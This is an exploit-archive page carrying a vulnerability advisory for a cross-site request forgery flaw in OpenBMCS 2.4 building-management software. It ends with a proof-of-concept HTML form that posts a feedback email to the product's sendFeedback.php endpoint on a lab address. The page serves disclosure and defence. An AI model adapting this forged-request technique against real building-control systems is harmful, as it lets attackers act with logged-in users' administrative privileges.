what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

OpenBMCS 2.4 Cross Site Request Forgery

OpenBMCS 2.4 Cross Site Request Forgery
Posted Jan 17, 2022
Authored by LiquidWorm | Site zeroscience.mk

OpenBMCS version 2.4 suffers from a cross site request forgery vulnerability.

tags | exploit, csrf
SHA-256 | 49761c5a766632d48b5e2db091385ef7d796cdc174fb58a9f84c48a390e63d92

OpenBMCS 2.4 Cross Site Request Forgery

Change Mirror Download

OpenBMCS 2.4 CSRF Send E-mail


Vendor: OPEN BMCS
Product web page: https://www.openbmcs.com
Affected version: 2.4

Summary: Building Management & Controls System (BMCS). No matter what the
size of your business, the OpenBMCS software has the ability to expand to
hundreds of controllers. Our product can control and monitor anything from
a garage door to a complete campus wide network, with everything you need
on board.

Desc: The application interface allows users to perform certain actions via
HTTP requests without performing any validity checks to verify the requests.
This can be exploited to perform certain actions with administrative privileges
if a logged-in user visits a malicious web site.

Tested on: Linux Ubuntu 5.4.0-65-generic (x86_64)
Linux Debian 4.9.0-13-686-pae/4.9.228-1 (i686)
Apache/2.4.41 (Ubuntu)
Apache/2.4.25 (Debian)
nginx/1.16.1
PHP/7.4.3
PHP/7.0.33-0+deb9u9


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience


Advisory ID: ZSL-2022-5691
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5691.php


26.10.2021

--


<html>
<body>
<form action="https://192.168.1.222/core/sendFeedback.php" method="POST">
<input type="hidden" name="subject" value="FEEDBACK%20TESTINGUS" />
<input type="hidden" name="message" value="Take me to your leader." />
<input type="hidden" name="email" value="lab@zeroscience.mk" />
<input type="submit" value="Send" />
</form>
</body>
</html>
Login or Register to add favorites

File Archive:

August 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    15 Files
  • 2
    Aug 2nd
    22 Files
  • 3
    Aug 3rd
    0 Files
  • 4
    Aug 4th
    0 Files
  • 5
    Aug 5th
    15 Files
  • 6
    Aug 6th
    11 Files
  • 7
    Aug 7th
    43 Files
  • 8
    Aug 8th
    42 Files
  • 9
    Aug 9th
    36 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    0 Files
  • 12
    Aug 12th
    27 Files
  • 13
    Aug 13th
    18 Files
  • 14
    Aug 14th
    50 Files
  • 15
    Aug 15th
    33 Files
  • 16
    Aug 16th
    23 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    43 Files
  • 20
    Aug 20th
    29 Files
  • 21
    Aug 21st
    42 Files
  • 22
    Aug 22nd
    26 Files
  • 23
    Aug 23rd
    25 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    21 Files
  • 27
    Aug 27th
    28 Files
  • 28
    Aug 28th
    15 Files
  • 29
    Aug 29th
    41 Files
  • 30
    Aug 30th
    13 Files
  • 31
    Aug 31st
    467 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close